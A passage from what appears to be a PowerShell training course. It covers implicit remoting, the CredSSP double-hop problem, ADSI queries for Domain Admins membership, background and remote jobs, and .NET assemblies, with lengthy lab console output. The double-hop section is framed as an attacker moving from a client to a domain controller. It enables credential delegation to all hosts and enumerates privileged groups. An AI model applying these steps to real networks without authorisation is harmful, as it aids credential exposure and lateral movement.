13 22960 26920 101 4.31 872 svchost JOHN-PC 1169 30 17248 20256 116 4.56 960 svchost JOHN-PC 440 16 6260 9468 55 0.64 1124 svchost JOHN-PC 693 26 12396 12236 81 0.97 1232 svchost JOHN-PC 303 24 9356 9012 48 0.72 1392 svchost JOHN-PC 347 15 5192 8320 66 0.41 1500 svchost JOHN-PC 357 35 144352 18592 210 11.60 1956 svchost JOHN-PC 346 13 7988 9420 66 1.43 2772 svchost JOHN-PC 94 7 1092 3908 25 0.10 3816 svchost JOHN-PC 562 0 44 556 2 4 System JOHN-PC 138 8 1972 3976 38 0.05 1292 taskhost JOHN-PC 115 5 1656 3420 44 0.35 684 VBoxService JOHN-PC 138 5 1220 3724 60 0.06 2104 VBoxTray JOHN-PC 74 5 780 2488 32 0.23 400 wininit JOHN-PC 113 4 1492 3156 39 0.27 448 winlogon JOHN-PC 439 15 7812 9964 107 0.58 556 wmpnetwk JOHN-PC 211 10 27928 36028 143 0.73 3476 wsmprovhost JOHN-PC PS C:\Users\Administrator\Desktop> ``` - ```Implicit Remoting``` ```PowerShell PS C:\Users\Administrator\Desktop> New-PSSession -ComputerName JOHN-PC -Credential John-PC\John Id Name ComputerName State ConfigurationName Availability -- ---- ------------ ----- ----------------- ------------ 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-PSSession Id Name ComputerName State ConfigurationName Availability -- ---- ------------ ----- ----------------- ------------ 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> $sess = Get-PSSession ``` Create a ```Get-Sysinfo``` function on the remote machine ```PowerShell PS C:\Users\Administrator\Desktop> Invoke-Command -ScriptBlock { function Get-Sysinfo { whoami; $env:COMPUTERNAME } } -Session $sess ``` Import the ```Get-Sysinfo``` function on our local machine ```PowerShell PS C:\Users\Administrator\Desktop> Import-PSSession -CommandName Get-Sysinfo -Session $sess ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0 tmp_4giwtlau.knk Get-Sysinfo PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Sysinfo john-pc\john JOHN-PC PS C:\Users\Administrator\Desktop> ``` Export the ```Get-Sysinfo``` function into a module ```PowerShell PS C:\Users\Administrator\Desktop> Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $sess WARNING: Proxy creation has been skipped for the following command: 'Get-Sysinfo', because it would shadow an existing local command. Use the AllowClobber parameter if you want to shadow existing local commands. Export-PSSession : No command proxies have been created, because all of the requested remote commands would shadow existing local commands. Use the AllowClobber parameter if you want to shadow existing local commands. At line:1 char:1 + Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $ses ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidResult: (:) [Export-PSSession], ArgumentException + FullyQualifiedErrorId : ErrorNoCommandsImportedBecauseOfSkipping,Microsoft.PowerShell.Commands.ExportPSSessionCommand PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $sess -AllowClobber -Force Directory: C:\Users\Administrator\Documents\WindowsPowerShell\Modules\domainmodule Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/11/2017 5:15 PM 99 domainmodule.format.ps1xml -a--- 7/11/2017 5:15 PM 596 domainmodule.psd1 -a--- 7/11/2017 5:15 PM 11689 domainmodule.psm1 PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Import-Module domainmodule ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Command -Module domainmodule CommandType Name ModuleName ----------- ---- ---------- Function Get-Sysinfo domainmodule PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Sysinfo john-pc\john JOHN-PC PS C:\Users\Administrator\Desktop> ``` ================================================ FILE: 25-Powershell-Remoting-Part-6.md ================================================ #### 25. Powershell Remoting Part 6 ###### The Double Hop Problem ![Image of Hop](images/4.jpeg) - ```Target 1``` - ```Windows Client``` - ```Part of a Domain``` - ```Target 2``` - ```Windows Server``` - ```Domain Controller``` - On ```Attacker``` ```PowerShell PS C:\Windows\system32> Enable-WSManCredSSP -Role Client -DelegateComputer * CredSSP Authentication Configuration for WS-Management CredSSP authentication allows the user credentials on this computer to be sent to a remote computer. If you use CredSSP authentication for a connection to a malicious or compromised computer, that computer will have access to your user name and password. For more information, see the Enable-WSManCredSSP Help topic. Do you want to enable CredSSP authentication? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y cfg : http://schemas.microsoft.com/wbem/wsman/1/config/client/auth lang : en-US Basic : true Digest : true Kerberos : true Negotiate : true Certificate : true CredSSP : true PS C:\Windows\system32> ``` ```PowerShell PS C:\Windows\system32> Get-WSManCredSSP The machine is configured to allow delegating fresh credentials to the following target(s): wsman/* This computer is not configured to receive credentials from a remote client computer. PS C:\Windows\system32> ``` - ```Enter-PSSession``` from ```Attacker``` machine on ```Target 1``` ```PowerShell PS C:\Users\Windows7-64> Enter-PSSession -ComputerName JOHN-PC -Credential PFPT\Administrator [john-pc]: PS C:\Users\Administrator\Documents> whoami pfpt\administrator [john-pc]: PS C:\Users\Administrator\Documents> Enable-WSManCredSSP -Role Server [john-pc]: PS C:\Users\Administrator\Documents> Get-WSManCredSSP [john-pc]: PS C:\Users\Administrator\Documents> exit ``` - ```Enter-PSSession``` from ```Attacker``` machine on ```Target 1``` using ```Authentication``` as ```CredSSP``` ```PowerShell PS C:\Users\Windows7-64> Enter-PSSession -ComputerName JOHN-PC -Credential PFPT\Administrator -Authentication CredSSP ``` - Access remote resources on the ```Domain Controller``` i.e. ```Target 2``` ```PowerShell PS C:\Users\Windows7-64> Enter-PSSession -ComputerName JOHN-PC -Credential PFPT\Administrator -Authentication CredSSP [john-pc]: PS C:\Users\Administrator\Documents> ls \\pfpt\sysvol Directory: \\pfpt\sysvol Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 7/9/2017 12:59 PM pfpt.com PS C:\Users\Administrator> ``` ###### ADIS Type Accelerators - ADSI ```Active Directory Service Interfaces``` is a set of COM interfaces used to access the features of directory services from different network providers. - Query the members of ```Domain Admin``` group ``` ([ADSI]"LDAP://cn=Domain Admins,cn=Users,dc=,dc=Com").Member ``` ```PowerShell PS C:\Users\Administrator> ([ADSI]"LDAP://cn=Domain Admins,cn=Users,dc=pfpt,dc=Com").Member CN=Administrator,CN=Users,DC=pfpt,DC=com PS C:\Users\Administrator> ``` - Query the ```DC``` for a ```user``` to determine the ```groups``` he is a member of ``` ([ADSI]"LDAP://cn=,cn=Users,dc=,dc=Com").MemberOf ``` ```PowerShell PS C:\Users\Administrator> ([ADSI]"LDAP://cn=Administrator,cn=Users,dc=pfpt,dc=Com").MemberOf CN=Group Policy Creator Owners,CN=Users,DC=pfpt,DC=com CN=Domain Admins,CN=Users,DC=pfpt,DC=com CN=Enterprise Admins,CN=Users,DC=pfpt,DC=com CN=Schema Admins,CN=Users,DC=pfpt,DC=com CN=Administrators,CN=Builtin,DC=pfpt,DC=com PS C:\Users\Administrator> ``` ================================================ FILE: 26-Jobs-in-Powershell.md ================================================ #### 26. Jobs in Powershell ###### Jobs - ```Help``` system for ```job``` ```PowerShell PS C:\Users\Administrator> help *job* Start-Job Cmdlet Microsoft.PowerShell.Core Starts a Windows PowerShell background job. Get-Job Cmdlet Microsoft.PowerShell.Core Gets Windows PowerShell background jobs that are running in the current session. Receive-Job Cmdlet Microsoft.PowerShell.Core Gets the results of the Windows PowerShell background jobs in the current session. Stop-Job Cmdlet Microsoft.PowerShell.Core Stops a Windows PowerShell background job. Wait-Job Cmdlet Microsoft.PowerShell.Core Suppresses the command prompt until one or all of the Windows PowerShell background jobs running in the session are complete. Remove-Job Cmdlet Microsoft.PowerShell.Core Deletes a Windows PowerShell background job. Suspend-Job Cmdlet Microsoft.PowerShell.Core Temporarily stops workflow jobs. Resume-Job Cmdlet Microsoft.PowerShell.Core Restarts a suspended job Get-PrintJob Function PrintManagement ... Remove-PrintJob Function PrintManagement ... Restart-PrintJob Function PrintManagement ... Resume-PrintJob Function PrintManagement ... Suspend-PrintJob Function PrintManagement ... New-JobTrigger Cmdlet PSScheduledJob New-JobTrigger... Add-JobTrigger Cmdlet PSScheduledJob Add-JobTrigger... Remove-JobTrigger Cmdlet PSScheduledJob Remove-JobTrigger... Get-JobTrigger Cmdlet PSScheduledJob Get-JobTrigger... Set-JobTrigger Cmdlet PSScheduledJob Set-JobTrigger... Enable-JobTrigger Cmdlet PSScheduledJob Enable-JobTrigger... Disable-JobTrigger Cmdlet PSScheduledJob Disable-JobTrigger... New-ScheduledJobOption Cmdlet PSScheduledJob New-ScheduledJobOption... Get-ScheduledJobOption Cmdlet PSScheduledJob Get-ScheduledJobOption... Set-ScheduledJobOption Cmdlet PSScheduledJob Set-ScheduledJobOption... Register-ScheduledJob Cmdlet PSScheduledJob Register-ScheduledJob... Get-ScheduledJob Cmdlet PSScheduledJob Get-ScheduledJob... Set-ScheduledJob Cmdlet PSScheduledJob Set-ScheduledJob... Unregister-ScheduledJob Cmdlet PSScheduledJob Unregister-ScheduledJob... Enable-ScheduledJob Cmdlet PSScheduledJob Enable-ScheduledJob... Disable-ScheduledJob Cmdlet PSScheduledJob Disable-ScheduledJob... Get-RDVirtualDesktopCollection... Function RemoteDesktop ... Stop-RDVirtualDesktopCollectio... Function RemoteDesktop ... Get-StorageJob Function Storage ... about_Jobs HelpFile Provides information about how Windows PowerShell background jobs run a about_Job_Details HelpFile Provides details about background jobs on local and remote computers. about_Remote_Jobs HelpFile Describes how to run background jobs on remote computers. about_Scheduled_Jobs HelpFile Describes scheduled jobs and explains how to use and manage about_Scheduled_Jobs_Advanced HelpFile Explains advanced scheduled job topics, including the file structure about_Scheduled_Jobs_Basics HelpFile Explains how to create and manage scheduled jobs. about_Scheduled_Jobs_Troublesh... HelpFile Explains how to resolve problems with scheduled jobs PS C:\Users\Administrator> ``` - ```Commands``` with ```jobs``` ```PowerShell PS C:\Users\Administrator> Get-Command *job* CommandType Name ModuleName ----------- ---- ---------- Function Get-PrintJob PrintManagement Function Get-RDVirtualDesktopCollectionJobStatus RemoteDesktop Function Get-StorageJob Storage Function Remove-PrintJob PrintManagement Function Restart-PrintJob PrintManagement Function Resume-PrintJob PrintManagement Function Stop-RDVirtualDesktopCollectionJob RemoteDesktop Function Suspend-PrintJob PrintManagement Cmdlet Add-JobTrigger PSScheduledJob Cmdlet Disable-JobTrigger PSScheduledJob Cmdlet Disable-ScheduledJob PSScheduledJob Cmdlet Enable-JobTrigger PSScheduledJob Cmdlet Enable-ScheduledJob PSScheduledJob Cmdlet Get-Job Microsoft.PowerShell.Core Cmdlet Get-JobTrigger PSScheduledJob Cmdlet Get-ScheduledJob PSScheduledJob Cmdlet Get-ScheduledJobOption PSScheduledJob Cmdlet New-JobTrigger PSScheduledJob Cmdlet New-ScheduledJobOption PSScheduledJob Cmdlet Receive-Job Microsoft.PowerShell.Core Cmdlet Register-ScheduledJob PSScheduledJob Cmdlet Remove-Job Microsoft.PowerShell.Core Cmdlet Remove-JobTrigger PSScheduledJob Cmdlet Resume-Job Microsoft.PowerShell.Core Cmdlet Set-JobTrigger PSScheduledJob Cmdlet Set-ScheduledJob PSScheduledJob Cmdlet Set-ScheduledJobOption PSScheduledJob Cmdlet Start-Job Microsoft.PowerShell.Core Cmdlet Stop-Job Microsoft.PowerShell.Core Cmdlet Suspend-Job Microsoft.PowerShell.Core Cmdlet Unregister-ScheduledJob PSScheduledJob Cmdlet Wait-Job Microsoft.PowerShell.Core PS C:\Users\Administrator> ``` - ```Start``` a ```job``` ```PowerShell PS C:\Users\Administrator> Start-Job -ScriptBlock {whoami} Id Name PSJobTypeName State HasMoreData Location Command -- ---- ------------- ----- ----------- -------- ------- 2 Job2 BackgroundJob Running True localhost whoami PS C:\Users\Administrator> ``` - List all ```jobs``` ```PowerShell PS C:\Users\Administrator> Get-Job Id Name PSJobTypeName State HasMoreData Location Command -- ---- ------------- ----- ----------- -------- ------- 2 Job2 BackgroundJob Completed True localhost whoami PS C:\Users\Administrator> ``` - Receive ```output``` of a ```job``` ```PowerShell PS C:\Users\Administrator> Get-Job | Receive-Job pfpt\administrator PS C:\Users\Administrator> ``` - Remove ```job``` ```PowerShell PS C:\Users\Administrator> Get-Job | Remove-Jobs ``` ```PowerShell PS C:\Users\Administrator> Get-Job ``` - ```Local job``` ```PowerShell PS C:\Users\Administrator> Start-Job -FilePath .\Desktop\HelloWorld.ps1 Id Name PSJobTypeName State HasMoreData Location Command -- ---- ------------- ----- ----------- -------- ------- 2 Job2 BackgroundJob Running True localhost "Hello World" PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-Job -Id 2 Id Name PSJobTypeName State HasMoreData Location Command -- ---- ------------- ----- ----------- -------- ------- 2 Job2 BackgroundJob Completed True localhost "Hello World" PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-Job -Id 2 | Receive-Job Hello World PS C:\Users\Administrator> ``` - ```Remote job``` ```Cmdlets``` with parameter ```Asjob``` ```PowerShell PS C:\Users\Administrator> Get-Command -ParameterName Asjob CommandType Name ModuleName ----------- ---- ---------- Cmdlet Get-WmiObject Microsoft.PowerShell.Management Cmdlet Invoke-Command Microsoft.PowerShell.Core Cmdlet Invoke-WmiMethod Microsoft.PowerShell.Management Cmdlet Remove-WmiObject Microsoft.PowerShell.Management Cmdlet Restart-Computer Microsoft.PowerShell.Management Cmdlet Set-WmiInstance Microsoft.PowerShell.Management Cmdlet Stop-Computer Microsoft.PowerShell.Management Cmdlet Test-Connection Microsoft.PowerShell.Management PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {ps} -ComputerName JOHN-PC -Credential John-PC\John Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName ------- ------ ----- ----- ----- ------ -- ----------- -------------- 128 5 14992 11460 44 1004 audiodg JOHN-PC 35 2 1344 3288 33 0.02 3108 conhost JOHN-PC 460 5 1064 2596 33 0.11 348 csrss JOHN-PC 214 6 1104 3628 32 0.26 404 csrss JOHN-PC 162 8 2344 8804 72 0.19 3772 dllhost JOHN-PC 68 4 932 3196 39 0.03 1132 dwm JOHN-PC 996 32 30576 44884 241 2.82 940 explorer JOHN-PC 0 0 0 12 0 0 Idle JOHN-PC 803 15 2944 8192 33 0.61 496 lsass JOHN-PC 196 5 1596 3916 23 0.05 504 lsm JOHN-PC 235 10 28168 36120 156 0.44 3100 powershell JOHN-PC 668 16 16072 9712 89 0.30 2224 SearchIndexer JOHN-PC 201 7 4272 6148 34 0.63 488 services JOHN-PC 29 1 216 664 4 0.05 272 smss JOHN-PC 281 9 4404 7320 58 0.06 1324 spoolsv JOHN-PC 143 4 1788 4076 28 0.38 1524 sppsvc JOHN-PC 355 7 2420 5748 34 0.31 608 svchost JOHN-PC 271 8 2128 4724 26 0.15 720 svchost JOHN-PC 551 14 14492 13176 81 0.32 772 svchost JOHN-PC 558 14 22972 30108 104 0.82 856 svchost JOHN-PC 1061 28 17912 20664 107 0.83 944 svchost JOHN-PC 589 21 6380 11044 58 0.24 1104 svchost JOHN-PC 624 27 9440 11600 75 0.32 1220 svchost JOHN-PC 318 25 8088 8468 47 0.34 1360 svchost JOHN-PC 363 35 147468 42280 210 8.04 1436 svchost JOHN-PC 96 7 1060 3676 25 0.04 1916 svchost JOHN-PC 423 17 5504 11052 70 0.19 2444 svchost JOHN-PC 335 38 7168 8608 62 0.23 2672 svchost JOHN-PC 548 0 48 600 2 4 System JOHN-PC 153 9 2128 4588 41 0.02 364 taskhost JOHN-PC 116 5 1444 3724 45 0.05 668 VBoxService JOHN-PC 134 5 1216 4284 61 0.03 2052 VBoxTray JOHN-PC 74 5 784 3012 32 0.09 396 wininit JOHN-PC 113 4 1532 4260 39 0.24 444 winlogon JOHN-PC 118 4 1788 4204 27 0.11 2840 WmiPrvSE JOHN-PC 421 15 7296 17944 107 0.40 2344 wmpnetwk JOHN-PC 209 10 27684 35648 139 0.72 880 wsmprovhost JOHN-PC PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> $sess = New-PSSession -ComputerName JOHN-PC -Credential John-PC\John ``` ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {Start-Job -ScriptBlock {ps}} -Session $sess Id Name PSJobTypeName State HasMoreData Location Command PSComputerName -- ---- ------------- ----- ----------- -------- ------- -------------- 1 Job1 Running True localhost ps JOHN-PC PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {Get-Job} -Session $sess Id Name PSJobTypeName State HasMoreData Location Command PSComputerName -- ---- ------------- ----- ----------- -------- ------- -------------- 1 Job1 Completed True localhost ps JOHN-PC PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {Get-Job | Receive-Job} -Session $sess Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName ------- ------ ----- ----- ----- ------ -- ----------- -------------- 31 2 492 1980 17 0.01 2156 conhost JOHN-PC 427 5 1080 2492 33 0.13 348 csrss JOHN-PC 161 6 1128 3488 32 0.27 404 csrss JOHN-PC 66 3 892 2908 38 0.03 1132 dwm JOHN-PC 823 26 28592 42576 207 2.92 940 explorer JOHN-PC 0 0 0 12 0 0 Idle JOHN-PC 791 15 3072 7340 33 0.64 496 lsass JOHN-PC 197 5 1600 3572 23 0.05 504 lsm JOHN-PC 240 11 24716 34280 147 0.37 4012 powershell JOHN-PC 661 15 15920 8708 88 0.31 2224 SearchIndexer JOHN-PC 192 7 4236 4748 33 0.63 488 services JOHN-PC 29 1 216 576 4 0.05 272 smss JOHN-PC 275 9 4312 5688 57 0.06 1324 spoolsv JOHN-PC 344 7 2452 5256 34 0.32 608 svchost JOHN-PC 257 8 2212 4532 26 0.19 720 svchost JOHN-PC 548 14 14412 11644 81 0.36 772 svchost JOHN-PC 515 13 25176 30232 103 1.57 856 svchost JOHN-PC 1009 25 11884 17924 88 0.94 944 svchost JOHN-PC 530 20 6088 9388 55 0.25 1104 svchost JOHN-PC 606 21 9660 10564 75 0.34 1220 svchost JOHN-PC 308 25 7956 6348 46 0.34 1360 svchost JOHN-PC 335 35 144320 23808 206 8.32 1436 svchost JOHN-PC 96 7 1060 3276 25 0.04 1916 svchost JOHN-PC 400 16 5376 10520 69 0.19 2444 svchost JOHN-PC 343 28 7832 8452 64 0.25 2672 svchost JOHN-PC 550 0 48 600 2 4 System JOHN-PC 147 8 2044 4344 40 0.02 364 taskhost JOHN-PC 116 5 1424 3352 44 0.05 668 VBoxService JOHN-PC 136 5 1192 3948 59 0.03 2052 VBoxTray JOHN-PC 74 5 784 2816 32 0.09 396 wininit JOHN-PC 113 4 1496 3596 39 0.24 444 winlogon JOHN-PC 112 4 1692 4000 26 0.11 2840 WmiPrvSE JOHN-PC 409 15 7232 3556 106 0.40 2344 wmpnetwk JOHN-PC 256 11 30032 38152 145 0.36 3140 wsmprovhost JOHN-PC PS C:\Users\Administrator> ``` Using ```AsJob``` ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {ps} -ComputerName JOHN-PC -Credential John-PC\John -AsJob Id Name PSJobTypeName State HasMoreData Location Command -- ---- ------------- ----- ----------- -------- ------- 7 Job7 RemoteJob Running True JOHN-PC ps PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-Job Id Name PSJobTypeName State HasMoreData Location Command -- ---- ------------- ----- ----------- -------- ------- 7 Job7 RemoteJob Completed True JOHN-PC ps PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-Job -id 7 | Receive-Job Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName ------- ------ ----- ----- ----- ------ -- ----------- -------------- 421 5 1080 2488 33 0.14 348 csrss JOHN-PC 161 6 1128 3492 32 0.27 404 csrss JOHN-PC 66 3 892 2908 38 0.03 1132 dwm JOHN-PC 827 26 28528 42488 206 2.92 940 explorer JOHN-PC 0 0 0 12 0 0 Idle JOHN-PC 798 15 3080 7416 33 0.65 496 lsass JOHN-PC 198 5 1608 3580 23 0.05 504 lsm JOHN-PC 655 15 15712 8244 81 0.31 2224 SearchIndexer JOHN-PC 194 8 4324 4808 34 0.63 488 services JOHN-PC 29 1 216 576 4 0.05 272 smss JOHN-PC 275 9 4312 5704 57 0.06 1324 spoolsv JOHN-PC 343 7 2420 5228 33 0.32 608 svchost JOHN-PC 256 8 2172 4500 26 0.20 720 svchost JOHN-PC 551 14 14392 11708 81 0.36 772 svchost JOHN-PC 516 13 25204 29328 103 1.78 856 svchost JOHN-PC 1010 25 11336 17900 88 0.95 944 svchost JOHN-PC 528 20 6060 9376 55 0.25 1104 svchost JOHN-PC 612 25 9764 10676 75 0.36 1220 svchost JOHN-PC 300 24 8076 6392 46 0.34 1360 svchost JOHN-PC 352 35 147444 17736 209 8.34 1436 svchost JOHN-PC 96 7 1060 3272 25 0.04 1916 svchost JOHN-PC 398 16 5376 10524 69 0.19 2444 svchost JOHN-PC 344 18 7840 8540 64 0.27 2672 svchost JOHN-PC 546 0 48 600 2 4 System JOHN-PC 147 8 2044 4344 40 0.02 364 taskhost JOHN-PC 116 5 1444 3348 44 0.06 668 VBoxService JOHN-PC 136 5 1192 3940 59 0.03 2052 VBoxTray JOHN-PC 74 5 784 2816 32 0.09 396 wininit JOHN-PC 113 4 1496 3596 39 0.24 444 winlogon JOHN-PC 112 4 1772 4092 26 0.11 2840 WmiPrvSE JOHN-PC 409 15 7232 3864 106 0.40 2344 wmpnetwk JOHN-PC 290 11 19988 29536 145 0.41 3140 wsmprovhost JOHN-PC 209 10 27672 35632 139 0.70 3172 wsmprovhost JOHN-PC PS C:\Users\Administrator> ``` ###### Exercise - Run jobs in a ```PSSession``` ```PowerShell PS C:\Users\Administrator> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\John ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Get-Job ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Start-Job -ScriptBlock {whoami} Id Name State HasMoreData Location Command -- ---- ----- ----------- -------- ------- 1 Job1 Running True localhost whoami [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Start-Job -ScriptBlock {ps} Id Name State HasMoreData Location Command -- ---- ----- ----------- -------- ------- 3 Job3 Running True localhost ps [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Get-Job Id Name State HasMoreData Location Command -- ---- ----- ----------- -------- ------- 1 Job1 Completed False localhost whoami 3 Job3 Completed True localhost ps [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Get-Job -id 1 | Receive-Job john-pc\john [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Get-Job -id 3 | Receive-Job Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 31 2 488 1968 17 0.00 3212 conhost 561 6 1164 2652 34 0.24 348 csrss 174 6 1128 3496 32 0.28 404 csrss 66 3 892 2900 38 0.03 1132 dwm 799 24 27856 40772 195 2.95 940 explorer 0 0 0 12 0 0 Idle 824 15 3184 7756 33 2.79 496 lsass 199 5 1624 3616 23 0.11 504 lsm 244 11 24744 34284 147 0.35 3692 powershell 136 7 10036 13220 60 6.42 2068 rundll32 682 17 18292 14416 121 1.20 2224 SearchIndexer 214 7 4364 5936 37 0.90 488 services 29 1 216 576 4 0.05 272 smss 279 9 4356 5748 58 0.06 1324 spoolsv 347 7 2540 5456 35 0.41 608 svchost 275 8 2164 4560 26 0.20 720 svchost 563 14 15432 12408 84 0.40 772 svchost 503 12 31660 37072 99 4.56 856 svchost 1024 25 12088 18948 91 1.07 944 svchost 547 21 6480 10076 56 0.25 1104 svchost 618 25 12424 12244 78 1.45 1220 svchost 311 25 8172 6796 46 0.34 1360 svchost 354 35 147768 42368 208 199.65 1436 svchost 98 7 1088 3332 25 0.04 1916 svchost 397 16 5376 10564 69 0.24 2444 svchost 342 16 7988 8712 65 0.38 2672 svchost 68 4 932 3616 25 0.02 4028 svchost 583 0 48 1456 3 4 System 150 9 2072 4384 40 0.02 364 taskhost 121 5 2652 6600 35 0.87 1808 TrustedInstaller 116 5 1444 3380 44 0.19 668 VBoxService 136 5 1192 3924 59 0.05 2052 VBoxTray 119 5 1344 4832 30 0.06 2168 VSSVC 74 5 784 2816 32 0.09 396 wininit 113 4 1496 3592 39 0.24 444 winlogon 173 7 4016 7880 53 0.08 2500 WmiPrvSE 411 15 7396 7460 107 0.46 2344 wmpnetwk 287 11 19404 25684 144 0.41 3140 wsmprovhost 360 12 43684 53604 161 1.05 3936 wsmprovhost [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> exit PS C:\Users\Administrator> ``` ================================================ FILE: 27-Using-NET-in-Powershell-Part-1.md ================================================ #### 27. Using .NET in Powershell Part 1 - Loaded ```assemblies``` in ```Powershell``` session ```PowerShell PS C:\> [AppDomain]::CurrentDomain.GetAssemblies() GAC Version Location --- ------- -------- True v2.0.50727 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Micros... True v2.0.50727 C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll True v2.0.50727 C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Man... True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e... True v2.0.50727 C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll True v2.0.50727 C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Con... True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WS... True v2.0.50727 C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\M... True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e3... True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft... True v2.0.50727 C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.dll True v2.0.50727 C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll True v2.0.50727 C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.Directo... True v2.0.50727 C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll PS C:\> ``` - Get the ```type``` of the ```Assembly``` ```PowerShell PS C:\> [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object {$_.GetType()} IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object PS C:\> ``` - ```Assemblies``` where ```IsPublic``` is ```True``` ```PowerShell PS C:\> [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object {$_.GetType()} | Where-Object {$_.IsPublic -eq "True"} IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object True True Assembly System.Object PS C:\> ``` - Use ```.Net``` class to print ```processes``` on the ```Machine``` ```PowerShell PS C:\> $Classes = [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object {$_.GetType()} | Where-Object {$_.IsPublic -eq "True"} ``` ```PowerShell PS C:\> $Classes | Where-Object {$_.Name -eq "Process"} ``` ```PowerShell PS C:\> $ProcClass = $Classes | Where-Object { $_.Name -eq "Process" } ``` List ```methods``` / ```properties``` of an object ```PowerShell PS C:\> $ProcClass | Get-Member ``` ```PowerShell PS C:\> $ProcClass | Get-Member -MemberType Method ``` ```PowerShell PS C:\> $ProcClass | Get-Member -MemberType Method -Static ``` ```PowerShell PS C:\> $ProcClass::GetCurrentProcess() ``` ```PowerShell PS C:\> $ProcClass.FullName System.Diagnostics.Process PS C:\> ``` ```PowerShell PS C:\> 